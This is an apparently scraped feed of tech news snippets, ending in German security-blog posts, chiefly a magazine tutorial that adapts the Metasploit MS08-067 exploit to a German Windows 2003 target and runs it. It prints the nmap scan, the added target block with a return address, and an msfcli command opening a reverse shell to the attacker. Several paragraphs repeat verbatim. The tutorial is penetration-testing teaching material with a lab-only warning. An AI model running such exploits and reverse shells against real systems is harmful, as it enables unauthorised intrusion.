0fnords.net

Another monster AMD graphics card pictured at CeBIT 2010.(author unknown)0251674920623560579416499624806174347421

So you are a nerd/geek and you've finally found a girl that will marry you…now what? How about using old school 8-bit video games as wedding invitations? Comments(author unknown)02516749206235605794

The gang at Tweakers.net have posted a few pictures of what they claim is a GeForce GTX 480. You'll need a translator to read the actual article but the pictures are universal. I snagged this one for those of you too lazy to click the link: Comments(author unknown)02516749206235605794

Looking for a way to get access to more content through Windows 7 Media Center? Maybe you’d like a good way to jump back and forth between Boxee and Media Center with just a click of the remote? Today we show you how to get access to Boxee through Media Center with Boxee Integration 1.0.

Installing Boxee

Download and install the current version of Boxee. (See download link below) The install is very straightforward, just take the defaults. You’ll also need to register for a Boxee account, if you don’t already have one.

If you have Windows Firewall enabled and this is the first time you’re running Boxee, allow it to access your network.

Boxee Integration 1.0

Close out of Windows Media Center, then download and install the Boxee Integration application. It’s also a simple install. Just take the defaults and click “Finish.”

Restart Windows Media Center and you’ll see a Boxee tile on your main interface.

Click on the Boxee tile to launch it. You will be prompted to enter your username and password. Select the “Remember password” option if you don’t want to have to enter your login credentials each time.

You’ll be prompted to set screen calibration. You can do so now, or click “Skip.”

 
Boxee will open up in full screen. From here you can enjoy all your favorite Boxee content.

When you exit Boxee, Windows Media Center will restart in Full Screen mode. It is not completely seamless. You will see the desktop and a command box flash for a few seconds before Media Center opens.

Conclusion

This a great way to get access to some popular apps that aren’t currently available in Media Center like Pandora, LastFM, and MLB.TV. Unfortunately, Boxee Integration does not work on extenders. If you like this Boxee Integration application, you might want to check out our earlier article on Hulu Integration in Windows Media Center.

Links

Download the latest version of Boxee

Download Boxee Integration 1.0

Similar Articles Productive Geek Tips

• Using Netflix Watchnow in Windows Vista Media Center (Gmedia)
• Integrate Hulu Desktop and Windows Media Center in Windows 7
• Schedule Updates for Windows Media Center
• Add Color Coding to Windows 7 Media Center Program Guide
• Automatically Start Windows 7 Media Center in Live TV Mode

• TouchFreeze Alternative in AutoHotkey
• The Icy Undertow Desktop
• Windows Home Server – Backup to LAN
• The Clear & Clean Desktop
• Use This Bookmarklet to Easily Get Albums
• Use AutoHotkey to Assign a Hotkey to a Specific Window

Latest Software Reviews Tinyhacker Random Tips

• Revo Uninstaller Pro
• Registry Mechanic 9 for Windows
• PC Tools Internet Security Suite 2010
• PCmover Professional

• Why we miss Leo Laporte daily on TechTV
• How to Manage Playback & Recording Audio Devices in Windows 7
• Tableau Public – Brilliant Data Visualization Tool
• The Public Folder Demystified (Win 7 & Vista)
• Stream Music on your Home Network with Windows Media Player 12
• Fun Brain Games For The Little Ones

DigitalGeekery0125719887902551781806344756831705880182025167492062356057940764997859906481037910447792601238574859143138412870473796940324413206913228783601502795426889351406130889634079704576320926683427763176775317581532763568486133

Like most torrent sites, Google is no stranger to removing “copyright infringing” listings from its search results. Following up on complaints from the Chinese government and of course copyright holders, the company has been censoring its search results for years.

The filtering process is not automated and DMCA takedown requests are generally reviewed manually. Sometimes this leads to errors, such as when Google removed The Pirate Bay’s home page from its search results last October.

The Pirate Bay homepage does not list any torrent files as most people know, so there was little doubt that the filter was applied in error. Google later admitted this mistake and after blaming it on an incorrect takedown request, the company finally said that an “internal error” was the reason behind the Pirate Bay ban.

As promised, The Pirate Bay homepage soon reappeared in Google’s search results and things went back to the way they were. However, fellow torrent site BTJunkie is now in a similar position as The Pirate Bay was a few months ago. BTJunkie’s homepage no longer comes up in Google.

“In response to a complaint we received under the US Digital Millennium Copyright Act, we have removed 1 result(s) from this page. If you wish, you may read the DMCA complaint that caused the removal(s) at ChillingEffects.org,” Google explains at the bottom of the search results.

The DMCA complaint Google links to appears to come from Fox and refers to the blockbuster movie Avatar. At the time of publication the full complaint is not yet available so we were unable to verify whether it listed BTJunkie’s home page.

Unlike The Pirate Bay, BTJunkie does list several torrents on its homepage including Avatar which is among the most downloaded torrents on the site. These lists are all dynamically generated and constantly changing of course, and it is unclear whether that will warrant a removal from the search results.

TorrentFreak discussed the issue with the owner of BTJunkie who told us that he has sent a counter notice to Google (picture below). Thus far Google has not responded on the issue, but we will update this article when there’s an official statement on BTJunkie’s removal.

BTjunkie’s counter notice

Article from: TorrentFreak, check out our new blog at FreakBits.

Here we go again. Following a few technical glitches over the weekend that required a bit of maintenance, the Large Hadron Collider (LHC) is set to be turned back on today.

The world's largest particle accelerator began firing off the first proton beams of 2010 on Saturday, but it all had to be shut down so the maintenance crew could work out a few kinks in the cryogenic systems that help regulate the superconducting magnets, Cern said.

"Engineers had to access the filters for the cryogenic systems," a spokesperson for Cern said. "They are fixing that, and we expect the beams to be circulating again tonight."

Cern had previously stated it hopes to run the LHC for up to two years at 3.5 teraelectron volts (TeV) per beam, and then shut it down before ramping up to 7 TeV. Once everything restarts again today, it will take about 2 to 4 weeks before the beam energy reaches 3.5 TeVs.

Paul Lilly02516749206235605794092130569434028764361135545778621092394905532760553119638178

Intel's famed LGA775 socket persisted through many families of processors, from Pentium 4 to Core 2 Quad. Could the socket that plays host to Core i5 processors today enjoy similar longevity? A recent Fudzilla report suggests so. The site claims Intel's next-generation Sandy Bridge processors will use the LGA1155...(author unknown)02516749206235605794

Cebit 2010: Claims its the fastest on the world(author unknown)02516749206235605794

From the announcement "Web Security Dojo is a turnkey web application security lab with tools, targets, and training materials built into a Virtual Machine(VM). It is ideal for both self-instruction and training classes since everything is pre-configured and no external network connection is needed. All tools and targets are configured to use...Robert A.02516749206235605794

Say what you will about AMD, Intel, and Nvidia's product lineups as they stand today. But all three employ undeniably-different philosophies in how they approach development and execution. Alan Dang explores how the next decade might look for this trio.



Nvidia - Intel Corporation - Advanced Micro Devices - Hardware - Components(author unknown)10194968852565305281025167492062356057940140369920291721943816882246426936129800

 Bookmark this on Delicious - Saved by tags2010 to drupal howto views versioncontrol - More about this bookmark tags201002516749206235605794

Atari looks to sell the rights(author unknown)02516749206235605794

After being somewhat dissapointed by the 3DMark03 benchmark results of of Acer's ION 2 equipped 532G netbook shared out earlier this week, the folks at Fudzilla have learned that ION 2 actually comes…

Steve Dougherty02516749206235605794

In der aktuellen Ausgabe der hakin9 Zeitschrift befindet sich mittlerweile Teil 3 der von mir verfassten Metasploit Artikelserie.

250 />

Wie üblich wird hier in nächster Zeit der Artikel für alle Leser bereitgestellt. In den nächsten Tagen wird es auch zur Veröffentlichung des dargestellten Shellscripts und des Videos zum Artikel kommen. Ich wünsche euch viel Spaß beim Lesen und noch viel mehr Spaß beim Experimentieren im Labor!

In der aktuellen Ausgabe der hakin9 Zeitschrift befindet sich mittlerweile Teil 3 der von mir verfassten Metasploit Artikelserie.

250 />

Wie üblich wird hier in nächster Zeit der Artikel für alle Leser bereitgestellt. In den nächsten Tagen wird es auch zur Veröffentlichung des dargestellten Shellscripts und des Videos zum Artikel kommen. Ich wünsche euch viel Spaß beim Lesen und noch viel mehr Spaß beim Experimentieren im Labor!
!--break-->
Weitere Infos findet ihr derzeit auf der hakin9 Webseite.

Ich freue mich auf Feedback jeglicher Art ...

hf
m-1-k-3

25000$ GUI for Metasploit ... http://www.s3cur1ty.de/25k-GUI-for-msf 2010-02-17T21:33:06+01:00 2010-02-17T21:51:14+01:00 m1k3

Metasploit bekommt eine neue GUI ;) Oder so ähnlich ...



Irgendwie hat es Metasploit durch den Rapid 7 Deal so richtig geschafft, Kunden des Exploiting Frameworks "Core Impact" haben nun den Hersteller Core soweit brachten, dass er Metasploit in sein Produkt integrieren wird. Also wenn das mal kein Zugeständnis für die Qualität der Metasploit Macher ist ...

Metasploit bekommt eine neue GUI ;) Oder so ähnlich ...



Irgendwie hat es Metasploit durch den Rapid 7 Deal so richtig geschafft, Kunden des Exploiting Frameworks "Core Impact" haben nun den Hersteller Core soweit brachten, dass er Metasploit in sein Produkt integrieren wird. Also wenn das mal kein Zugeständnis für die Qualität der Metasploit Macher ist ...

Soweit so gut! Für Metasploit eigentlich der große Schlag, da die Branchengröße nun scheinbar dazu gezwungen ist das Open Source Framework zu unterstützen. Die andere Seite dabei ist natürlich der bittere Beigeschmack von Open Source ... Core kann nun den Code von Metasploit ohne weiteres übernehmen und auf deren jahrelanger Entwicklung aufbauen bzw diese für sich nutzen.

Ich enthalte mich jetzt meiner Meinung darüber noch und lasse den Blogpost erstmals rein informativ hier stehen ;)

Bis demnächst, wenn wir wissen wie sportlich sich Core dann auch verhält! In der Zwischenzeit sehe ich das System als teure GUI für Metasploit *harhar*

Source:

• http://blog.coresecurity.com/2010/02/16/integrating-core-impact-pro-with...

m-1-k-3

basic Webaudit script v0.2 http://www.s3cur1ty.de/script-basic-webaudit-v02 2010-02-10T22:40:26+01:00 2010-02-13T22:22:25+01:00 m1k3

Bei verschiedensten Schwachstellenanalysen, Pentests, Sicherheitsaudits, ... steht man häufig vor dem Problem 20++ Webserver auf Schwachstellen analysieren zu müssen. Manche davon haben Content, manche haben nur die Default IE oder Apache Webseite. Analysiert gehören sie dennoch alle! Man weiss ja nie ob nicht auf dem einen oder anderen ein Admininterface verfügbar ist ;)

Wenn man nun weit über 20 solcher Server vor sich hat stellt sich die Frage wie man diese einer ersten grundlegenden Analyse unterziehen kann?!? Auf Basis dieser grundlegenden Analyse ist es im Anschluss möglich die anschließende, detaillierte Untersuchung erheblich zielgerichteter durchzuführen.

Bei verschiedensten Schwachstellenanalysen, Pentests, Sicherheitsaudits, ... steht man häufig vor dem Problem 20++ Webserver auf Schwachstellen analysieren zu müssen. Manche davon haben Content, manche haben nur die Default IE oder Apache Webseite. Analysiert gehören sie dennoch alle! Man weiss ja nie ob nicht auf dem einen oder anderen ein Admininterface verfügbar ist ;)

Wenn man nun weit über 20 solcher Server vor sich hat stellt sich die Frage wie man diese einer ersten grundlegenden Analyse unterziehen kann?!? Auf Basis dieser grundlegenden Analyse ist es im Anschluss möglich die anschließende, detaillierte Untersuchung erheblich zielgerichteter durchzuführen.
!--break-->
Nachdem letztes Jahr bereits eine erste Version meines Scriptes zur ersten Grobuntersuchung von Webservern entstand habe ich dieses Script einem kleinen Update unterzogen. Es wurde auf die aktuelle Backtrack 4 und die aktuelle Metasploit Version angepasst. Weitere kleinere Anpassungen aus den letzten Sicherheitsanalysen flossen natürlich auch ein.

Folgende Updates wurden durchgeführt:

• die zu scannende IP Adresse lässt sich auch per CLI Option angeben (nicht wie bisher ausschließlich über ein File)
• der Nikto Scan lässt sich per CLI Option aktivieren
• es lassen sich weitere Metasploit Optionen spezifizieren (Option -msf)
• kleinere Anpassungen an die akutelle MSF Version waren nötig
• eine Pfadanpassung bei der Ausführung von Nikto war nötig
• die zu analysierenden Dateiendungen lassen sich als Option in der Grundkonfiguration definieren

Was wird automatisiert?

Automatisiert werden die typischen Metasploit und Nikto Aufgaben. Darunter fällt ein Directory Scan, verschiedenste File Scans, der Scan nach der Webserverversion und nach den unterstützten Optionen, wie auch ein vollständiger Nikto Scan (der sich deaktivieren lässt).

• Webserver Version
  Metasploit Auxiliary Mode: auxiliary/scanner/http/http_version
  
  
• Webserver Optionen:
  Metasploit Auxiliary Mode: auxiliary/scanner/http/options
  
  
• Ist auf das / Directory schreibender Zugriff möglich?
  Metasploit Auxiliary Mode: auxiliary/scanner/http/writable
  
  
• Suche nach Verzeichnissen:
  Metasploit Auxiliary Mode: auxiliary/scanner/http/wmap_dir_scanner
  
  
• Suche nach verschiedensten files
  Metasploit Auxiliary Mode: auxiliary/scanner/http/wmap_files_dir
  
  
• Analyse der SSL Ciphers
  Metasploit Auxiliary Mode: auxiliary/scanner/http/wmap_ssl
  
  
• Nikto Webserveranalyse
  
  

Hat man dies alles automatisiert erledigt kann man aus den Logfiles sehr gut erkennen wo man nun evtl. für weitere Analysen ansetzen kann.

Usage:

./msf-http-enum-v0.2.sh -i IP-File -s IP-File-HTTPS -f IP-Port-File -p PATH -o outputdirectory -n -msf MSF-Options

./msf-http-enum-v0.2.sh -iph IP-address (HTTP) -p PATH -o outputdirectory -n -msf MSF-Options

./msf-http-enum-v0.2.sh -ips IP-address (HTTPS) -p PATH -o outputdirectory -n -msf MSF-Options

Example:
./msf-http-enum-v0.2.sh -iph xx.xxx.xxx.xxx -n -msf "UserAgent=bla VHOST=www.----.de NoDetailMessages=false"

hf
m-1-k-3

Hacking Google the Metasploit way oder from Aurora to god with msf http://www.s3cur1ty.de/from-Aurora-to-admin-with-msf 2010-01-27T12:33:29+01:00 2010-01-27T12:35:54+01:00 m1k3

Die letzten Wochen waren für Microsoft bitter. Erst kam ein unangenehmer Exploit für den IE ans Tageslicht, durch den scheinbar auch mehrere große Unternehmen kompromittiert wurden, anschließend wurde als Draufgabe auch noch ein Privilege Escalation Exploit veröffentlicht. Dieser Privilege Escalation Exploit trifft auch noch nahezu jedes Windows System dass es jemals gab.

Grund genug für die Entwickler von Metasploit diese Exploits in das Framework zu integrieren und somit der breiten Öffentlichkeit zur Verfügung zu stellen.

Die letzten Wochen waren für Microsoft bitter. Erst kam ein unangenehmer Exploit für den IE ans Tageslicht, durch den scheinbar auch mehrere große Unternehmen kompromittiert wurden, anschließend wurde als Draufgabe auch noch ein Privilege Escalation Exploit veröffentlicht. Dieser Privilege Escalation Exploit trifft auch noch nahezu jedes Windows System dass es jemals gab.

Grund genug für die Entwickler von Metasploit diese Exploits in das Framework zu integrieren und somit der breiten Öffentlichkeit zur Verfügung zu stellen.

Folgende Bilderserie zeigt die Eskalationskette um ein System, auf dem mit einem nicht privilegierten User gearbeitet wird, vollständig zu übernehmen.

Metasploit - fixing the framework http://www.s3cur1ty.de/metasploit-fixing-the-framework 2010-01-20T21:36:40+01:00 2010-01-23T18:29:13+01:00 m1k3

Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu gehört unter anderem der automatisierte Exploitingvorgang durch die Einbindung weiterer Tools, wie auch die Verwendung von Multistage Payloads oder der automatisierte Sammelvorgang von Informationen nach einem erfolgreichen Exploitingvorgang.

150 />

All diese Automatismen helfen allerdings nicht weiter, wenn bereits die Anwendung eines Exploits scheitert. Dies ist beispielsweise der Fall, wenn das Zielsystem zwar die Schwachstelle aufweist, Metasploit dieses System nicht vollständig unterstützt. Bevor wir uns im dritten Artikel, in der nächsten Ausgabe, mit dem automatisierten Exploitingvorgang mehrerer Systeme beschäftigen, passen wir in diesem Artikel einen vorhandenen Exploit an eine vorgegebene Zielumgebung an.

Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu gehört unter anderem der automatisierte Exploitingvorgang durch die Einbindung weiterer Tools, wie auch die Verwendung von Multistage Payloads oder der automatisierte Sammelvorgang von Informationen nach einem erfolgreichen Exploitingvorgang.

150 />

All diese Automatismen helfen allerdings nicht weiter, wenn bereits die Anwendung eines Exploits scheitert. Dies ist beispielsweise der Fall, wenn das Zielsystem zwar die Schwachstelle aufweist, Metasploit dieses System nicht vollständig unterstützt. Bevor wir uns im dritten Artikel, in der nächsten Ausgabe, mit dem automatisierten Exploitingvorgang mehrerer Systeme beschäftigen, passen wir in diesem Artikel einen vorhandenen Exploit an eine vorgegebene Zielumgebung an.
!--break-->

MS08-067

Dieser Artikel beschäftigt sich mit einer Schwachstelle, die in dem Microsoft Bulletin MS08-067 beschrieben wird. Über diese Schwachstelle soll es, laut diesem Bulletin, möglich sein Remotezugriff auf ein Windowssystem zu erlangen. Wie in Abbildung 1 dargestellt, wird dieses Sicherheitsproblem von Microsoft als kritisch eingestuft. Diese Schwachstelle lässt sich über das Netzwerk ausnützen und es ist nahezu jedes Windows Betriebssystem davon betroffen. Ende des Jahres 2008/ Anfang 2009 rückte die dargestellte Schwachstelle durch den Conficker Wurm in regelmäßigen Abständen in die Medien. Vor allem durch das scheinbar nachlässige Patchverhalten vieler Systembetreuer konnte sich Conficker bis in das Jahr 2009 in hohem Maße verbreiten. An dieser Stelle muss auf die hohe Relevanz eines einwandfrei funktionierenden und zeitnahen Patchmanagement hingewiesen werden. Probleme, wie sie von dieser Schwachstelle ausgehen bzw. durch den Conficker Wurm ausgelöst wurden, entstehen im Normalfall nicht, wenn in einem Unternehmen sauber definierte Prozesse zur System- und Softwareaktualisierung vorhanden sind und diese auch korrekt umgesetzt werden.

500 />

Auf Grund dieser sehr interessanten aber nicht besonders ruhmreichen Vergangenheit, des hohen Verbreitungsgrades und der enormen Gefahr, die von dieser Schwachstelle ausgeht, stellt diese ein sehr gutes Beispiel dar, um verfügbare Exploits praktisch anzuwenden und diese auch an das Zielsystem anzupassen. Im Folgenden wird dies anhand des in Abbildung 2 dargestellten Windows 2003 Serversystems mit Service Pack 2 und deutscher Sprachversion demonstriert.

500 />

Als Metasploit Version kommt die in Listing 1 dargestellte Version 3.3-dev auf einem Backtrack 4-prefinal Linuxsystem zum Einsatz. Da sich der benötigte Exploit bereits seit einiger Zeit im Framework befindet, sollten auch die meisten früheren Versionen aus dem Jahr 2009 funktionieren. Prüfen lässt sich das sehr einfach mit dem, in Listing 2 dargestellten Befehl „msfcli | grep ms08_067“.

Listing 1: eingesetzte Metasploit Version


=[ msf v3.3-dev
+ -- --=[ 381 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 156 aux


msf > version
Framework: 3.3-dev.6055
Console : 3.3-dev.6706

Einer der ersten Schritte eines typischen Pentests ist die Erkennung des Zielsystems inklusive aller verfügbaren Dienste. Hierfür kann beispielsweise Nmap mit seiner System- und Diensterkennung verwendet werden. Für solche Aufgaben sind die Nmap Optionen „–A“ oder „–sV“ und „–O“ üblicherweise sehr hilfreich. Seit Version 5.0 verfügt Nmap über die Nmap Scripting Engine (NSE) und beinhaltet ein Script für die Erkennung der in diesem Artikel behandelten Schwachstelle. Ein Scanvorgang, der Nmap veranlasst einen ganzen Netzwerkbereich auf die Schwachstelle zu testen, lässt sich beispielsweise mit folgendem CLI Aufruf erstellen:

nmap -p445 -PN -sS -oA windows.445 --script=smb-check-vulns.nse 192.168.1.0/24

Die System und Diensterkennung liefert die benötigten Details über das eingesetzte Betriebssystem und die offenen Ports mit Versionsdetails, sowie auch eine erste Einschätzung ob das geprüfte System die Schwachstelle (MS08-067) aufweist. Für weitere Informationen bezüglich Nmap und NSE sei auf die Links in den Internetressourcen am Ende des Artikels verwiesen.

Der Einsatz des Metasploit Exploiting Frameworks beginnt mit der Suche nach einem passenden Exploit, für die per Nmap ermittelte Schwachstelle. Im Rahmen dieses Artikels wird hierfür die „msfcli“ verwendet. Um den passenden Exploit zu finden, bietet sich die Verwendung des Linuxtools grep an. Eine beispielhafte Ausgabe des Suchvorganges ist in Listing 2 dargestellt.

Listing 2: Exploit Auswahl


m1k3@s3cur1ty:/pentest/exploits/framework3$ ./msfcli | grep ms08 | grep 067
[*] Please wait while we load the module tree...
exploit/windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Kommt die msfconsole zum Einsatz, lässt sich der Exploit mit folgendem Aufruf ermitteln:

search exploits ms08_067

Da die von diesem Exploit benötigten Speicheradressen je nach eingesetztem Service Pack unterschiedlich sind und sich zusätzlich noch zwischen den einzelnen Sprachversionen unterscheiden, muss dieser Exploit für die Zielsystemversion optimiert sein. Metasploit bringt bereits eine hohe Anzahl solcher definierter „Targets“ mit und ermöglicht meist eine einfache Anwendung der Exploits. In Listing 3 ist ein Ausschnitt der möglichen Windows Zielsysteme des gewählten Exploits mit dem vollständigen CLI Aufruf dargestellt. An dieser Ausgabe ist erkennbar, dass Windows 2003-SP2 mit deutschem Sprachpaket offensichtlich nicht unterstützt wird und der Exploit dadurch in der vorhandenen Ausführung nicht für das Zielsystem einsetzbar ist.

Listing 3: ms08_067_netapi Targets (Auszug)


m1k3@s3cur1ty:/pentest/exploits/framework3$ ./msfcli exploit/windows/smb/ms08_067_netapi T
[*] Please wait while we load the module tree...


Id Name
-- ----
0 Automatic Targeting
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)

Um den Exploit trotz der fehlenden Sprachunterstützung für das vorhandene Zielsystem einsetzen zu können, muss im ersten Schritt der Sourcecode des Exploits analysiert werden. Das zuständige Ruby File ist unterhalb des Framework Root-Ordners „/pentest/exploits/framework3“ zu finden. Die Namensgebung des Exploits ist identisch mit dem Source File und verwendet als Dateiendung ein „rb„ für Ruby. Unter dem „modules“ Ordner findet man alle von Metasploit angebotenen Exploits, Payloads und Auxiliary-Module, wie auch die vorhandenen Encoder. An dieser Stelle sei jedem eine kurze Reise durch die Metasploit Ordner Hierarchie nahe gelegt.

m1k3@s3cur1ty:/pentest/exploits/framework3$ sudo vim modules/exploits/windows/smb/ms08_067_netapi.rb

Der allgemeine Aufbau dieser Source-Files wird in diesem Artikel nicht weiter beschrieben. In den meisten Fällen ist die Struktur dieser Files weitestgehend selbsterklärend. Nach kurzem Einlesen ist der Aufbau verständlich und man findet die relevanten Bereiche des Exploits ohne größere Probleme. In unserem Fall erkennen wir an der Definition der Targets, dass unterschiedliche Zielsysteme verschiedene Adressen in der Ret-Variable besitzen. Des Weiteren lässt sich aus den Kommentaren erkennen, dass es sich bei diesen Adressen um die Speicheradressen einer „JMP ESI“ Funktion handelt. Nach dieser Analyse des Sourcecodes ist somit bekannt, dass eine JMP-ESI Adresse eines deutschen Windows 2003 Servers mit SP2 benötigt wird.

Als Basis für diesen Artikel wird ein Windows 2003 Server ohne Execution Protection (NX) betrachtet. Weitere Informationen zu Execution Protection (NX) finden Sie in den Internet Ressourcen am Ende des Artikels.

Analyse im Debugger

Der folgende Abschnitt betrachtet die Analyse eines Windows 2003 Server Systems mit dem Ziel, durch den vorhandenen Metasploit Exploit „ms08_067_netapi“ einen privilegierten Systemzugriff zu erlangen. Es wird die im Source File erkannte „JMP ESI“ Funktion gesucht und beschrieben wie man diese Information zu einem funktionierenden Exploit umsetzt.

Im Normalfall eines Angriffs bzw. eines Pentests müsste man das Zielsystem nachbauen und mit Hilfe eines Debuggers auf dem Testsystem die Adresse einer „JMP ESI“ Funktion ermitteln. Der Einfachheit halber wird in diesem Artikel direkt das Zielsystem für diese Analyse verwendet.
Zum Debuggen bietet sich das frei erhältliche Tool Oldybg an, welches keine Installation benötigt.
Nach dem Start des Debuggers hängen wir, wie in Abbildung 3 dargestellt ist, mit File-Open den Internet Explorer an den Debugger an. Hierfür kann nahezu jeder beliebige Prozess verwendet werden. Der angehängte Prozess läuft dadurch im Debugger ab, wodurch sich dessen Funktionsweise detailliert analysieren lässt.

500 />

Für die vorhandene Aufgabenstellung ist nicht die Anwendung (im dargestellten Fall der Internet Explorer) von Interesse, sondern die geladenen Module die im Anschluss nach der benötigten Funktion „JMP ESI“ durchsucht werden. Diese können über die Menüsteuerung „View -> Executable Modules“ (Alt+E) oder per Schnellzugriff über den E-Knopf gelistet werden Das in Abbildung 4 dargestellte Ergebnis kann je nach System variieren, beinhaltet jedoch in jedem Fall diverse Module, die sich auf den meisten Windows 2003 Servern wiederfinden. Im dargestellten Fall bietet sich, die in Abbildung 4 dargestellte Datei, user32.dll an.

Über den Kontextmenüpunkt (Abbildung 5) der rechten Maustaste „ search for“ -> „command“ (Strg+F) kann die gefundene Datei user32.dll Datei nach der benötigten „JMP ESI“ Funktion durchsucht werden. Als Suchanweisung wird wie in Abbildung 6 dargestellt, „JMP ESI“ verwendet.

500 />

Im daraufhin erscheinenden Fenster, welches in Abbildung 6 dargestellt wird, ist es möglich die benötigte Anweisung „JMP ESI“ im User32 Modul zu suchen.

In Abbildung 7 ist am linken oberen Eck die Adresse des gefundenen „JMP ESI“ erkennbar. Die Adresse „77E6C974“ ist die gesuchte Speicheradresse an der die gesuchte Funktion abgelegt ist. Diese Adresse wird für die Modifikation des vorhandenen Exploits verwendet.

Mit dieser Adresse ist es nun möglich, den Exploit für einen Windows 2003 Server mit deutschem Sprachpaket vorzubereiten. Der Codeabschnitt in Listing 4 stellt den Code-Block dar, der dem Exploit in der Target Auswahl hinzugefügt werden muss. Dieser Block lässt sich einfach per Copy und Paste in die vorhandene Target Definition, ab Zeile 63, einfügen.

Listing 4: JMP ESI
@s3cur1ty:/pentest/exploits/framework3$ sudo vim modules/exploits/windows/smb/ms08_067_netapi.rb<
@s3cur1ty:/pentest/exploits/framework3$>

…
[ 'Windows 2003 SP2 German',
{
'Ret' => 0x77E6C974, # hier die eigene Adresse einfügen
'Scratch' => 0x00020408,
}
], # JMP ESI user32.dll
…

Mit folgendem Aufruf lässt sich zudem überprüfen, ob der Exploit korrekt bearbeitet wurde und das neue Zielsystem bei den vorhandenen Targets angezeigt wird.

./msfcli exploit/windows/smb/ms08_067_netapi T

Die Ausgabe aller möglichen Zielsysteme sollte nun unser neu definiertes, deutsches Windows 2003 Server System beinhalten.

Angriff

Mit Hilfe des überarbeiteten Exploits kann das Zielsystem schließlich angegriffen werden. Bei der Anwendung des Exploits werden dem Framework über Parameter die Zieladressen, der zu verwendende Payload und das auszuwählende Target (der im vorigen Schritt überarbeitete Bereich) mitgeteilt. Je nach Payload und Exploit können weitere Optionen anfallen die mit der Metasploit Option „O“ für „Options“ abrufbar sind. Mögliche Payloads werden mit dem Parameter „P“ aufgelistet.
In Listing 5 wird zur Demonstration der erfolgreiche Exploitingvorgang dargestellt. Hierfür wurden folgende Parameter angewendet:

• RHOST für die Ziel-IP Adresse
• PAYLOAD für den zu verwendenden Shellcode
• TARGET für das neu definierte Zielsystem
• Die Variable LHOST, da diesmal eine Reverse Shell zum Einsatz kommt

Der Parameter LHOST steht für die IP Adresse auf die sich die Reverse Shell verbinden soll. In diesem beispielhaften Szenario ist dies die IP-Adresse des Angriffssystems. In dem vorhandenen Fall befindet sich der von uns hinzugefügte Code an Stelle 3 und wird mit „TARGET=3“ angesteuert. Mit einem abschließendem „E“ welches für Exploit steht wird der Exploit angewendet.

Listing 5: Exploiting ms08-067


m1k3@s3cur1ty:/pentest/exploits/framework3$ ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.108 PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.106 TARGET=3 E


[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.106:4444 -> 192.168.1.108:1026)


Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


C:\WINDOWS\system32>

Die eingesetzte Reverse Shell ist in Listing 5 an folgender Zeile erkennbar:

[*] Command shell session 1 opened (192.168.1.106:4444 -> 192.168.1.108:1026)

Im Gegensatz zur Bindshell erkennt man an dieser Ausgabe, dass die Verbindung auf den lokalen Port 4444 zugreift und somit vom RHOST ausgeht und zu dem Angriffssystem (LHOST) retour aufgebaut wird.

Im letzten Artikel (Metasploit Exploiting Framework – the basics) sah die Ausgabe bei dem Einsatz einer Bindshell folgendermaßen aus:

[*] Command shell session 1 opened (192.168.1.106:42715 -> 192.168.1.107:4444)

Die IP Adresse 192.168.1.106 war, wie in Listing 5, der Angreifer. Das System mit der IP Adresse 192.168.1.107 war das Opfersystem, auf dem eine Systemshell auf Port 4444 erstellt wurde. Der Zugriff erfolgte hierbei vom Angriffssystem auf die Bindshell des Opfersystems.

Ein erfolgreicher Exploitingvorgang hängt von vielen unterschiedlichen Faktoren ab. Falls der dargestellte Exploitingvorgang nicht auf Anhieb erfolgreich ist, kann das am Patchlevel des Zielsystems liegen. Idealerweise wird für erste Tests ein frisch installiertes, deutsches Windows 2003 System mit SP2, ohne weiterer Updates oder sonstiger Software eingesetzt. Im nächsten Schritt sollte die Korrektheit der Speicheradresse der übernommenen „JMP ESI“ Funktion mit einem Debugger überprüft werden. Zu beachten ist, dass die dargestellte Vorgehensweise nur bei deaktivierter „Datenausführungsverhinderung“ funktioniert. Über Start -> Ausführen und dem Befehl sysdm.cpl gelangen Sie in die Systemeigenschaften, in denen diese Funktion wie in Abbildung 8 gezeigt, deaktiviert werden kann. Bei anhaltenden Problemen kann ein Neustart des Testsystems Abhilfe schaffen.

500 /> Reverse Shell

Im Gegensatz zu den im ersten Artikel beschriebenen Exploitingvorgängen, wurde in diesem Beitrag eine Reverse Shell als Payload verwendet. Eine Reverse Shell hat im Speziellen bei Angriffen über Netzwerkgrenzen hinweg erhebliche Vorteile bei der Anwendung. Diese Möglichkeit wird in einem späteren Artikel im Rahmen von Client Side Attacks relevant. Im Fall einer Reverse Shell verbindet sich das Zielsystem zurück zum Angreifer. Durch diese Verbindung, wird die Chance erhöht, Firewall- bzw. Filtersysteme zu umgehen. Würde das Zielsystem beispielsweise eine lokale Firewall einsetzen, wäre eine Bindshell nicht weiter zielführend, da der Remote-Zugriff auf diesen Shellzugang auch bei einem erfolgreichen Exploitingvorgang von der Firewall unterbunden wird. Reverse Shells sind im Speziellen bei Systemen erfolgreich anzuwenden die von Firewalls geschützt werden, welche nur eingehende Verbindungen überwachen und ausgehende Verbindungen automatisch als vertrauenswürdig einstufen.

Video und weitere Info

An dieser Stelle muss ausdrücklich festgehalten werden, dass der beschriebene Exploitingvorgang ausschließlich in einer gesicherten Testumgebung zur Anwendung gebracht werden darf. Werden Angriffe dieser Art auf Systemen durchgeführt, für die keine ausdrückliche Erlaubnis erteilt wurde, stellt dies unter Umständen eine strafrechtlich relevante Handlung dar. Für den Aufbau einer Testumgebung in der solche Exploits und weitere Angriffstechniken zur Anwendung gebracht werden können, verweise ich auf den Artikel „Sichere Umgebung für Penetration Testing“ in Ausgabe 02/2009.

Folgendes Video zeigt die im Artikel beschriebene Vorgehensweise:

500 />
Wie geht es weiter?

